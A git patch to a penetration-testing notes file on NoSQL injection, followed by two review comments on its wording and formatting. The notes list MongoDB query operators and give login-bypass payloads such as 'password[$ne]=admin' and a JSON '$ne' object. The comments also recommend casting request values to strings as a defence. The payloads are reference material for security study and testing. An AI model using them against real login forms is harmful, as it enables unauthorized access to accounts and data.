From b7ee005c6831b455e58837f08f0af3a2bc42edbe Mon Sep 17 00:00:00 2001 From: whx Date: Sun, 13 Nov 2022 23:54:35 +0100 Subject: [PATCH] NoSQL update --- Exploits/Databases/NoSQL Injection.md | 23 +++++++++++++++++------ 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/Exploits/Databases/NoSQL Injection.md b/Exploits/Databases/NoSQL Injection.md index b75f00f..105bd09 100644 --- a/Exploits/Databases/NoSQL Injection.md +++ b/Exploits/Databases/NoSQL Injection.md @@ -9,8 +9,8 @@ * [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/) * [Elasticsearch docs](https://www.elastic.co/guide/index.html) -# Operators -* Most common +## Operators +* A precondition to the injection is to know the most common operators listed below ```sql $and $or @@ -22,16 +22,27 @@ $exists $regex ``` -## Tips & Tricks +## Injection -* Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar` - * 2D array via `user[$nin][]=foo` +The payload is delivered inside the parameters of the request. To deliver malicious payload the operators can be negated. That means the for example all users except the known one used in the request is included in the response from the database server. + +* Pass HTTP parameter as an array instead of `user=` and `password=` use +```sh +user[$operator]=foo&password[$operator]=bar +``` + +* Give a 2D array a chance as well while fiddling with the request in following way +```sh +user[$nin][]=foo +``` + +### Examples -## Example * POST or GET parameters ```sh username=admin&password[$ne]=admin ``` + * JSON ```json {"username":"user","password":{"$ne":""} }
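Review bot: in the first hunk, the fenced operator list right below the reworded bullet still carries the ```sql tag, but `$and`, `$or`, `$ne`, `$exists` and `$regex` are MongoDB query operators, not SQL; now that the bullet tells the reader they must know these operators, tag that block `text` (or `json`) so neither the highlighter nor the reader treats it as SQL. The demotion of `# Operators` to `## Operators` is fine, since it now matches the `## Injection` heading introduced in the second hunk.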
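Review bot: the new introductory paragraph in the second hunk has grammar and accuracy problems. "To deliver malicious payload the operators can be negated. That means the for example all users except the known one used in the request is included in the response" should read along the lines of "To deliver a malicious payload, a comparison operator such as `$ne` is injected; for example, every user except the one named in the request then matches the query." `$ne` is not a negated operator but the not-equal comparison, and it matches per field: `password[$ne]=admin` matches any document whose password differs from `admin`, which is exactly why the login filter becomes trivially satisfiable. The two query-string snippets are fenced as ```sh although they are URL-encoded form parameters, not shell (in a shell `$operator` and `$nin` would be expanded as variables); use ```text instead. "2D array" is also misleading: `user[$nin][]=foo` is decoded by the framework into the nested document `{"user": {"$nin": ["foo"]}}`, i.e. an operator whose value is an array, so call it a nested array and show the resulting query document, as the JSON example `{"password":{"$ne":""}}` already does for `$ne`. Since the whole section rests on user input being passed to the query as an object, it should also state the corresponding mitigation: cast request values to strings, or reject keys beginning with `$`, before they reach the query.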